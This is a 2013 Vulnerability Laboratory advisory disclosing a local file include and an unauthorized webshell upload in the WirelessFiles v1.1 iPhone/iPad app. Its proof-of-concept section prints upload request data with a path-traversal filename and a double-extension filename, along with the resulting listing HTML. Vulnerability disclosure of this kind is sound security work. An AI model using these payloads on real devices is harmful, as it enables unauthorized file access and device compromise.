WirelessFiles 1.1 iPad iPhone - Multiple Vulnerabilities

Title:
======
WirelessFiles v1.1 iPad iPhone - Multiple Web Vulnerabilities


Date:
=====
2013-02-06


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=847


VL-ID:
=====
848


Common Vulnerability Scoring System:
====================================
7.5


Introduction:
=============
This application starts a web server on your device and allows downloads and uploads of any files from it using any browser on any 
other computer or device. No cables, drivers or clients are necessary, just a browser.

Right from this application you can send these files to any other application ready to accept this file type. Or, you can send the 
files to Wireless Files for further download to your computer. There is no problems with national file names.
With this program You have web access to photos and videos on your device. Show your photos in a nice Web Album on big screen without 
cables and so on. For that, you need to enter your web-server from any computer using LAN or WWAN address. Just type one of the 
indicated addresses in the address bar of your browser (Internet Explorer, Mozilla Firefox, Safari or any others). Also, you can start 
WirelessFiles on one device, enter the web-server in your browser from another device, and transfer your photos,for example,to the 
first device, and then put them in Camera Roll. (The transfer of photos to and from Camera Roll is available only in iOS 6 and up).
For all this to work, you need to have a working connection to the network where your device is located.

For LAN,It usually works right on the spot, if you have a modem or Wi-Fi router. If you have an AccessPoint (AP) connected to your 
modem or router, you will need to switch the AP to the bridge mode in order to join the local network and Wi-Fi network into one. In 
case you experience problems with connection, contact a specialist – this can be easily adjusted. It’s much harder with WWAN. It’s a 
network access point provided by your cell network operator. As a rule, you cannot connect your computer to your device using WWAN. 
Still, if Internet access on your computer is provided by the same operator, everything will get connected and running.

The application wouldn’t work in the background, so it switches off autoblocking while running. Any unexpected calls will 
interrupt your file transfer. By default, the application allows storing a limited number of files – no more than 3 of them; 
with the size of each not more than 10 MB. But you can remove all these limitations at the minimal price of $0.99 / €0.89.
Second limitation - program show only 10 first photos in webalbum, remove this limitation - $0.99 / €0.89.

Still, if something isn’t working, DO NOT buy removal of restrictions – this will not improve operability of the system itself. 
Pay ONLY in case everything works, and you need to store more than 3 files or larger size. The application include basic protection 
of the web-server from unauthorized access.

(Copy of the Homepage: https://itunes.apple.com/de/app/wirelessfiles/id573161053 )


Abstract:
=========
The Vulnerability Laboratory Research Team discovered a local file include vulnerability in the mobile WirelessFiles v1.1 app for the apple ipad & iphone.


Report-Timeline:
================
2013-02-06:	Public Disclosure


Status:
========
Published


Affected Products:
==================
Apple AppStore
Product: WirelessFiles Application - (iPad & iPhone) 1.1


Exploitation-Technique:
=======================
Remote


Severity:
=========
High


Details:
========
A local file include web vulnerability via POST request method is detected in the mobile WirelessFiles v1.1 app for the apple ipad & iphone.
The vulnerability allows remote attackers via POST method to inject local app webserver folders to request unauthorized local webserver files.

1.1
The main vulnerbility is located in the upload file submit formular of the webserver (http://192.168.0.10/) when processing to load a manipulated 
filename via POST. The execution of the injected path or file request will occur when the attacker is watching the file index listing.

1.2
Attackers can also unauthorized implement mobile webshells by using a double filename extension (bild.js.php.jpg) when processing to upload (submit) 
via POST request method. The attacker uploads a file with a double extension and access the file in the secound step via directory webserver listing 
to compromise the apple iphone or ipad.

Exploitation of the local file include web vulnerability does not require user interaction but a low privileged user account (standard pass blank).
Successful exploitation of the local web vulnerability results in ipad or iphone compromise via file include attack.


Vulnerable Application(s):
				[+] WirelessFiles - ITunes or AppStore (Apple)

Vulnerable Module(s):
				[+] File Upload via Submit (Web Server) [Remote]

Vulnerable Parameter(s):
				[+] filename

Affected Module(s):
				[+] Filename - Listing
				[+] Webalbum Filename  - Listing


Proof of Concept:
=================
1.1
The vulnerability can be exploited by remote attackers with low privileged application user account and without required user interaction.
For demonstration or reproduce ...

Local File Include - PoC (POST)

POSTDATA =-----------------------------200962619920015
Content-Disposition: form-data; name="value"; filename="../../../../cmd>home>tmp.png"               # < Include Path & File
Content-Type: image/png
--
Authorization=Digest username="ben37", realm="defaultRealm@host.com", nonce="2D2E8D09-6502-4266-B95E-28EB15CA8896", uri="/", 
response="9942037c9ddae787f56cadcdb7570c89", qop=auth, nc=00000014, cnonce="9cb396be6aa86cb3"


Review: Filename - (Upload) Listing

<tbody><tr class="styleZag">
<th scope="col" width="50%"><div align="left">   File Name</div></th>
              <th scope="col" width="25%"><span>Date and Time</span></th>
              <th scope="col" width="25%"><div align="right">Size</div></th>
          </tr>
            <tr class="styleRow">
<th scope="col" width="50%"><div align="left">   
<a href="http://192.168.0.10/../../../../cmd>home>tmp.png?%00">
<../../../../cmd>home>tmp.png?%00">%20%20%20%20</a></div></th>



1.2 
The vulnerability can be exploited by remote attackers with low privileged application user account and without required user interaction.
For demonstration or reproduce ...

Unauthroized File Upload/Access (Webshell)

POSTDATA =-----------------------------200962619920015
Content-Disposition: form-data; name="value"; filename="hacking.js.php.jpg"               # < Include File with multiple file extensions
Content-Type: image/png
--
Authorization=Digest username="ben38", realm="defaultRealm@host.com", nonce="2D2E8D09-6502-4266-B95E-28EB15CA8896", uri="/", 
response="9942037c9ddae787f56cadcdb7570c89", qop=auth, nc=00000014, cnonce="9cb396be6aa86cb3"

Review: Filename - (Upload) Listing

<tbody><tr class="styleZag">
<th scope="col" width="50%"><div align="left">   File Name</div></th>
              <th scope="col" width="25%"><span>Date and Time</span></th>
              <th scope="col" width="25%"><div align="right">Size</div></th>
          </tr>
            <tr class="styleRow">
<th scope="col" width="50%"><div align="left">   
<a href="http://192.168.0.10/hacking.js.php.jpg"><a href=hacking.js.php.jpg></a>%20%20%20%20</a></div></th>


Risk:
=====
The security risk of the local file include web vulnerability and unauthorized file upload/access bug are estimated as high(+).


Credits:
========
Vulnerability Laboratory [Research Team]  -    Benjamin Kunz Mejri (bkm@vulnerability-lab.com)


Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.vulnerability-lab.com/register
Contact:    admin@vulnerability-lab.com 	- support@vulnerability-lab.com 	       - research@vulnerability-lab.com
Section:    video.vulnerability-lab.com 	- forum.vulnerability-lab.com 		       - news.vulnerability-lab.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.

    				   	Copyright © 2012 | Vulnerability Laboratory



-- 
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: research@vulnerability-lab.com